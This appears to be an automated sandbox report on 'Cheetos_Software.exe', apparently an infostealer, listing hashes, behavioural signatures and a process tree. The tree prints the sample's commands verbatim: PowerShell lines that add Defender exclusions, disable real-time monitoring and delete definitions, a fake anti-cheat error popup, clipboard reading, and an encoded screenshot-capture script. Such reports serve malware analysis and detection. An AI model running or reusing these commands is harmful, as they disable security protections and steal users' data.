Analysis
-
max time kernel
94s -
max time network
98s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
07-04-2024 20:08
Behavioral task
behavioral1
Sample
Cheetos_Software.exe
Resource
win10v2004-20240226-en
General
-
Target
Cheetos_Software.exe
-
Size
7.4MB
-
MD5
621451f7c4c3be3ffa015e011d02a8c0
-
SHA1
ecf6c848f7cb4444945d255e0d7dd52b8f77bccd
-
SHA256
d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251
-
SHA512
73593e5820f4da948330944ddb260f232fbfe8a7cc657f6b8c085b2894c0f1cc5db51d2b9f90f47cd449e5a5d130e648b73c4cec43edfccd173eda883e8adb8d
-
SSDEEP
196608:6A8PjLjv+bhqNVoB0SEsucQZ41JBbIP11tJm:f8P3L+9qz80SJHQK1Jy1vJm
Malware Config
Signatures
-
Drops file in Drivers directory 3 IoCs
Processes:
Cheetos_Software.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts Cheetos_Software.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 2104 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Cheetos_Software.exepid process 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe 3164 Cheetos_Software.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI40922\python311.dll upx behavioral2/memory/3164-25-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\libssl-3.dll upx behavioral2/memory/3164-47-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp upx behavioral2/memory/3164-48-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\libcrypto-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ctypes.pyd upx behavioral2/memory/3164-54-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp upx behavioral2/memory/3164-57-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp upx behavioral2/memory/3164-59-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp upx behavioral2/memory/3164-62-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp upx behavioral2/memory/3164-70-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp upx behavioral2/memory/3164-69-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp upx behavioral2/memory/3164-71-0x00007FFE04410000-0x00007FFE04932000-memory.dmp upx behavioral2/memory/3164-80-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp upx behavioral2/memory/3164-78-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp upx behavioral2/memory/3164-81-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp upx behavioral2/memory/3164-79-0x00007FFE16170000-0x00007FFE16184000-memory.dmp upx behavioral2/memory/3164-64-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp upx behavioral2/memory/3164-60-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp upx behavioral2/memory/3164-116-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp upx behavioral2/memory/3164-118-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp upx behavioral2/memory/3164-122-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp upx behavioral2/memory/3164-135-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp upx behavioral2/memory/3164-136-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp upx behavioral2/memory/3164-145-0x00007FFE04410000-0x00007FFE04932000-memory.dmp upx behavioral2/memory/3164-304-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp upx behavioral2/memory/3164-307-0x00007FFE04410000-0x00007FFE04932000-memory.dmp upx behavioral2/memory/3164-310-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp upx behavioral2/memory/3164-309-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp upx behavioral2/memory/3164-308-0x00007FFE16170000-0x00007FFE16184000-memory.dmp upx behavioral2/memory/3164-306-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp upx behavioral2/memory/3164-305-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp upx behavioral2/memory/3164-303-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp upx behavioral2/memory/3164-302-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp upx behavioral2/memory/3164-301-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp upx behavioral2/memory/3164-300-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp upx behavioral2/memory/3164-299-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp upx behavioral2/memory/3164-298-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp upx behavioral2/memory/3164-297-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp upx behavioral2/memory/3164-296-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 1720 tasklist.exe 4360 tasklist.exe 1944 tasklist.exe 4976 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4148 powershell.exe 4772 powershell.exe 4616 powershell.exe 4148 powershell.exe 4148 powershell.exe 4772 powershell.exe 4772 powershell.exe 4616 powershell.exe 4616 powershell.exe 1416 powershell.exe 1416 powershell.exe 2704 powershell.exe 2704 powershell.exe 1416 powershell.exe 2704 powershell.exe 4264 powershell.exe 4264 powershell.exe 864 powershell.exe 864 powershell.exe 4876 powershell.exe 4876 powershell.exe 1832 powershell.exe 1832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetasklist.exetasklist.exetasklist.exepowershell.exeWMIC.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 1720 tasklist.exe Token: SeDebugPrivilege 4360 tasklist.exe Token: SeDebugPrivilege 1944 tasklist.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeIncreaseQuotaPrivilege 1316 WMIC.exe Token: SeSecurityPrivilege 1316 WMIC.exe Token: SeTakeOwnershipPrivilege 1316 WMIC.exe Token: SeLoadDriverPrivilege 1316 WMIC.exe Token: SeSystemProfilePrivilege 1316 WMIC.exe Token: SeSystemtimePrivilege 1316 WMIC.exe Token: SeProfSingleProcessPrivilege 1316 WMIC.exe Token: SeIncBasePriorityPrivilege 1316 WMIC.exe Token: SeCreatePagefilePrivilege 1316 WMIC.exe Token: SeBackupPrivilege 1316 WMIC.exe Token: SeRestorePrivilege 1316 WMIC.exe Token: SeShutdownPrivilege 1316 WMIC.exe Token: SeDebugPrivilege 1316 WMIC.exe Token: SeSystemEnvironmentPrivilege 1316 WMIC.exe Token: SeRemoteShutdownPrivilege 1316 WMIC.exe Token: SeUndockPrivilege 1316 WMIC.exe Token: SeManageVolumePrivilege 1316 WMIC.exe Token: 33 1316 WMIC.exe Token: 34 1316 WMIC.exe Token: 35 1316 WMIC.exe Token: 36 1316 WMIC.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeIncreaseQuotaPrivilege 1316 WMIC.exe Token: SeSecurityPrivilege 1316 WMIC.exe Token: SeTakeOwnershipPrivilege 1316 WMIC.exe Token: SeLoadDriverPrivilege 1316 WMIC.exe Token: SeSystemProfilePrivilege 1316 WMIC.exe Token: SeSystemtimePrivilege 1316 WMIC.exe Token: SeProfSingleProcessPrivilege 1316 WMIC.exe Token: SeIncBasePriorityPrivilege 1316 WMIC.exe Token: SeCreatePagefilePrivilege 1316 WMIC.exe Token: SeBackupPrivilege 1316 WMIC.exe Token: SeRestorePrivilege 1316 WMIC.exe Token: SeShutdownPrivilege 1316 WMIC.exe Token: SeDebugPrivilege 1316 WMIC.exe Token: SeSystemEnvironmentPrivilege 1316 WMIC.exe Token: SeRemoteShutdownPrivilege 1316 WMIC.exe Token: SeUndockPrivilege 1316 WMIC.exe Token: SeManageVolumePrivilege 1316 WMIC.exe Token: 33 1316 WMIC.exe Token: 34 1316 WMIC.exe Token: 35 1316 WMIC.exe Token: 36 1316 WMIC.exe Token: SeDebugPrivilege 4976 tasklist.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeIncreaseQuotaPrivilege 424 WMIC.exe Token: SeSecurityPrivilege 424 WMIC.exe Token: SeTakeOwnershipPrivilege 424 WMIC.exe Token: SeLoadDriverPrivilege 424 WMIC.exe Token: SeSystemProfilePrivilege 424 WMIC.exe Token: SeSystemtimePrivilege 424 WMIC.exe Token: SeProfSingleProcessPrivilege 424 WMIC.exe Token: SeIncBasePriorityPrivilege 424 WMIC.exe Token: SeCreatePagefilePrivilege 424 WMIC.exe Token: SeBackupPrivilege 424 WMIC.exe Token: SeRestorePrivilege 424 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Cheetos_Software.exeCheetos_Software.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4092 wrote to memory of 3164 4092 Cheetos_Software.exe Cheetos_Software.exe PID 4092 wrote to memory of 3164 4092 Cheetos_Software.exe Cheetos_Software.exe PID 3164 wrote to memory of 4496 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4496 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 3648 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 3648 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 900 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 900 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4752 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4752 3164 Cheetos_Software.exe cmd.exe PID 4496 wrote to memory of 4616 4496 cmd.exe powershell.exe PID 4496 wrote to memory of 4616 4496 cmd.exe powershell.exe PID 4752 wrote to memory of 4772 4752 cmd.exe powershell.exe PID 4752 wrote to memory of 4772 4752 cmd.exe powershell.exe PID 3648 wrote to memory of 4148 3648 cmd.exe powershell.exe PID 3648 wrote to memory of 4148 3648 cmd.exe powershell.exe PID 900 wrote to memory of 4856 900 cmd.exe mshta.exe PID 900 wrote to memory of 4856 900 cmd.exe mshta.exe PID 3164 wrote to memory of 1384 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1384 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1984 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1984 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 2920 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 2920 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1100 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1100 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4384 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4384 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1432 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 1432 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4672 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4672 3164 Cheetos_Software.exe cmd.exe PID 1984 wrote to memory of 4360 1984 cmd.exe tasklist.exe PID 1984 wrote to memory of 4360 1984 cmd.exe tasklist.exe PID 3164 wrote to memory of 3264 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 3264 3164 Cheetos_Software.exe cmd.exe PID 1384 wrote to memory of 1720 1384 cmd.exe tasklist.exe PID 1384 wrote to memory of 1720 1384 cmd.exe tasklist.exe PID 3164 wrote to memory of 2652 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 2652 3164 Cheetos_Software.exe cmd.exe PID 4384 wrote to memory of 1944 4384 cmd.exe tasklist.exe PID 4384 wrote to memory of 1944 4384 cmd.exe tasklist.exe PID 1100 wrote to memory of 1416 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 1416 1100 cmd.exe powershell.exe PID 4672 wrote to memory of 984 4672 cmd.exe systeminfo.exe PID 4672 wrote to memory of 984 4672 cmd.exe systeminfo.exe PID 2920 wrote to memory of 1316 2920 cmd.exe WMIC.exe PID 2920 wrote to memory of 1316 2920 cmd.exe WMIC.exe PID 3264 wrote to memory of 964 3264 cmd.exe reg.exe PID 3264 wrote to memory of 964 3264 cmd.exe reg.exe PID 1432 wrote to memory of 2880 1432 cmd.exe tree.com PID 1432 wrote to memory of 2880 1432 cmd.exe tree.com PID 2652 wrote to memory of 2704 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 2704 2652 cmd.exe powershell.exe PID 3164 wrote to memory of 924 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 924 3164 Cheetos_Software.exe cmd.exe PID 924 wrote to memory of 4020 924 cmd.exe tree.com PID 924 wrote to memory of 4020 924 cmd.exe tree.com PID 3164 wrote to memory of 4784 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 4784 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 2988 3164 Cheetos_Software.exe cmd.exe PID 3164 wrote to memory of 2988 3164 Cheetos_Software.exe cmd.exe PID 2988 wrote to memory of 896 2988 cmd.exe tree.com PID 2988 wrote to memory of 896 2988 cmd.exe tree.com -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 4796 attrib.exe 1576 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"4⤵PID:4856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 